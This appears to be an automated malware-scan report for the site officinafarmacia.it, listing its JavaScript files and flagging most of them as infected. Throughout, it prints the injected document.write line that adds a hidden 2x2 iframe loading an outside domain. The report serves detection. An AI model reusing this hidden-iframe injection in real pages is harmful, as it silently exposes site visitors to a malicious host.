Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=officinafarmacia.it
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.officinafarmacia.it/ | 200 OK Content-Length: 15074 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/hlnv.html?i=2380537 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?i=2380537> | ||
http://91.239.65.173/t/link.php | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://91.239.65.173/test404page.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://code.jquery.com/jquery-1.7.1.min.js | 200 OK Content-Length: 93868 Content-Type: application/x-javascript | clean |
http://www.officinafarmacia.it/javascripts/jquery.scrollTo.js | 200 OK Content-Length: 2417 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537></iframe>');
;(function(d){var k=d.scrollTo=function(a,i,e){d(window).scrollTo(a,i,e)};k.defaults={axis:'xy',duration:parseFloat(d.fn.jquery)>=1.3?0:1};k.window=function(a){return d(window)._scrollable()};d.fn._scrollable=function(){return this.map(function(){var a=this,i=!a.nodeName||d.inArray(a.nodeName.toLowerCase(),['if Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/hlnv.html?j=2380537 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537> | ||
http://www.officinafarmacia.it/javascripts/jquery.nav.min.js | 200 OK Content-Length: 1817 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537></iframe>');
(function(e){e.fn.onePageNav=function(k){var g=e.extend({},e.fn.onePageNav.defaults,k),c={};c.sections={};c.bindNav=function(b,d,a,f,l){var h=b.parent(),i=b.attr("href"),j=e(window);if(!h.hasClass(a)){c.adjustNav(d,h,a);j.unbind(".onePageNav");e.scrollTo(i,l,{onAfter:function(){if(f)window.location.hash=i;j.bind(" c.getPositions(b);var a=false;e(window).bind("scroll.onePageNav",function(){a=true});setInterval(function(){if(a){a=false;c.scrollChange(b,d.currentClass)}},250)};return this.each(function(){var b=e(this),d=e.meta?e.extend({},g,b.data()):g;c.init(b,d)})};e.fn.onePageNav.defaults={currentClass:"current",changeHash:false,scrollSpeed:750}})(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/hlnv.html?j=2380537 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537> | ||
http://www.officinafarmacia.it/javascripts/jquery.tweet.js | 200 OK Content-Length: 13427 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537></iframe>');
(function (factory) { if (typeof define === 'function' && define.amd) define(['jquery'], factory); else factory(jQuery); }(function ($) { $.fn.tweet = function(o){ var s = $.extend({ username: null, list: null, children('li:even').addClass('tweet_odd'); if (s.outro_text) list.after(outro); $(widget).trigger("loaded").trigger((tweets.length === 0 ? "empty" : "full")); if (s.refresh_interval) { window.setTimeout(function() { $(widget).trigger("tweet:load"); }, 1000 * s.refresh_interval); } }); }).trigger("tweet:load"); }); }; })); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/hlnv.html?j=2380537 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537> | ||
http://www.officinafarmacia.it/javascripts/jquery.flexslider.js | 200 OK Content-Length: 14189 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537></iframe>');
(function ($) { $.fn.extend({ flexslider: function(options) { var defaults = { animation: "fade", slideshow: true, slideshowSpeed: 7000, animationDuration: 500, directionNav: true, var sliderTimer; $(window).resize(function(){ newSlides.width(slider.width()); container.width(((length + 2) * slider.width()) + 2000); clearTimeout(sliderTimer); sliderTimer = setTimeout(function(){ flexAnimate(currentSlide); }, 300); }); } } }); })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/hlnv.html?j=2380537 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537> | ||
http://www.officinafarmacia.it/javascripts/jquery.tipTip.js | 200 OK Content-Length: 7032 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537></iframe>');
(function($){ $.fn.tipTip = function(options) { var defaults = { activation: "hover", keepAlive: false, maxWidth: "200px", edgeOffset: 3, defaultPosition: "bottom", delay: 400, fadeIn: 200, fadeOut: 200, attribute: "title", content: if (timeout){ clearTimeout(timeout); } timeout = setTimeout(function(){ tiptip_holder.stop(true,true).fadeIn(opts.fadeIn); }, opts.delay); } function deactive_tiptip(){ opts.exit.call(this); if (timeout){ clearTimeout(timeout); } tiptip_holder.fadeOut(opts.fadeOut); } } }); } })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/hlnv.html?j=2380537 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537> | ||
http://www.officinafarmacia.it/javascripts/zoombox.js | 200 OK Content-Length: 21163 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537></iframe>');
var scr=document.getElementsByTagName('script'); var zoombox_path = scr[scr.length-1].getAttribute("src").replace('zoombox.js',''); (function($){ var options = { theme : 'zoombox', opacity : 0.8, duration : 800, animation : true, scrOfX = window.pageXOffset; } else if( document.body && ( document.body.scrollLeft ) ) { scrOfX = document.body.scrollLeft; } else if( document.documentElement && ( document.documentElement.scrollLeft ) ) { scrOfX = document.documentElement.scrollLeft; } return scrOfX; } })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/hlnv.html?j=2380537 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537> | ||
http://www.officinafarmacia.it/javascripts/jquery.validate.min.js | 200 OK Content-Length: 25472 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537></iframe>');
(function($){$.extend($.fn,{validate:function(options){if(!this.length){options&&options.debug&&window.console&&console.warn("nothing selected, can't validate, returning nothing");return;}var validator=$.data(this[0],'validator');if(validator){return validator;}validator=new $.validator(opt Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/hlnv.html?j=2380537 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537> | ||
http://www.officinafarmacia.it/javascripts/contactForm.js | 200 OK Content-Length: 1872 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537></iframe>');
jQuery(document).ready(function($) { $("#CommentForm").validate({ submitHandler: function(form) { ajaxContact(form); return false; } }); $("#subscribeForm").validate(); }); function ajaxContact(theForm) { var $ = jQuery; $('#loader').fadeIn(); result = 'Your message has been sent. Thank you!'; c = 'success'; } else { result = response; c = 'error'; } note.removeClass('success').removeClass('error').text(''); var i = setInterval(function() { if ( !note.is(':visible') ) { note.html(result).addClass(c).slideDown('fast'); clearInterval(i); } }, 40); }); } }); return false; } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/hlnv.html?j=2380537 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537> | ||
http://www.officinafarmacia.it/javascripts/pagination.js | 200 OK Content-Length: 2995 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537></iframe>');
(function($){ $.fn.sweetPages = function(opts){ if(!opts) opts = {}; var resultsPerPage = opts.perPage || 3; var ul = this; var li = ul.find('li'); li.each(function(){ var el = $(this); el.data('height',el.outerHeight(true)); }); e.preventDefault(); }); hyperLinks.eq(0).addClass('active'); swControls.css({ 'left':'50%', 'margin-left':-swControls.width()/2 }); return this; }})(jQuery); $(document).ready(function(){ $('#holder').sweetPages({perPage:1}); var controls = $('.swControls').detach(); controls.appendTo('#main'); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/hlnv.html?j=2380537 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537> | ||
http://www.officinafarmacia.it/javascripts/functions.js | 200 OK Content-Length: 766 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537></iframe>');
$(document).ready(function() { $('#nav').onePageNav(); $('a.zoombox').zoombox({ autoplay: true }); $(".ourTeam").tipTip(); $('.flexslider').flexslider(); $(".tweet").tweet({ username: "seaofclouds", join_text: "auto", count: 1, auto_join_text_default: "we said,", auto_join_text_ed: "we", auto_join_text_ing: "we were", auto_join_text_reply: "we replied to", auto_join_text_url: "we were checking out", loading_text: "loading tweets..." }); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/hlnv.html?j=2380537 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537> | ||
http://www.officinafarmacia.it/javascripts/tabs.js | 200 OK Content-Length: 876 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537></iframe>');
$('body').on('click', 'ul.tabs > li > a', function(e) { var contentLocation = $(this).attr('href'); if(contentLocation.charAt(0)=="#") { e.preventDefault(); $(this).parent().siblings().children('a').removeClass('active'); $(this).addClass('active'); $(contentLocation).show().addClass('active').siblings().hide().removeClass('active'); } }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/hlnv.html?j=2380537 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/hlnv.html?j=2380537> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: officinafarmacia.it
Result:
GET / HTTP/1.1
Host: officinafarmacia.it
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: officinafarmacia.it
Referer: http://www.google.com/search?q=officinafarmacia.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: officinafarmacia.it
Referer: http://www.google.com/search?q=officinafarmacia.it
Result:
The result is similar to the first query. There are no suspicious redirects found.